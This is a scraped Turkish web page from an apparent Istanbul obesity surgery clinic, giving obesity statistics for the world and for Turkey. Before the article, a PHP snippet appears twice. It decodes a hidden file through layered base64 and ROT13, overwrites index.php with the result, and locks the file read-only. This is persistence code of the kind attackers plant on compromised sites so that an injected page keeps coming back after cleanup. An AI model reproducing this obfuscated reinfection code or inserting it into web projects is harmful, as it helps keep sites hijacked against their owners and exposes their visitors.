$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Türkiye'de Obezite - İstanbul Obezite Cerrahisi Merkezi

Skip links

Türkiye’de Obezite

Dünyada Obezite Sorunu Ne Düzeydedir?

Dünya Sağlık Örgütü (WHO) bir obezite pandemisinden, yani salgınından bahsetmektedir. 1995 yılında dünyada 200 milyon obez erişkin varken 2000 yılında bu sayı 300 milyona ulaşmıştır.

Türkiye’de Obezite Sorunu Ne Düzeydedir?

Yapılan araştırmalara göre, Türk erkeklerinin dörtte birinde (%25), kadınların da yarıya yakınında (%44) obezite belirlenmiştir. Bu oran 10 yıl öncesine göre  erkeklerde iki kat artmış, 50 yaş üzeri kadınlarda da %40’tan az iken %50’ye yükselmiştir. Bu oranlarla Türkiye Avrupa’nın en obez ülkesi olmuş durumdadır.

Bitnami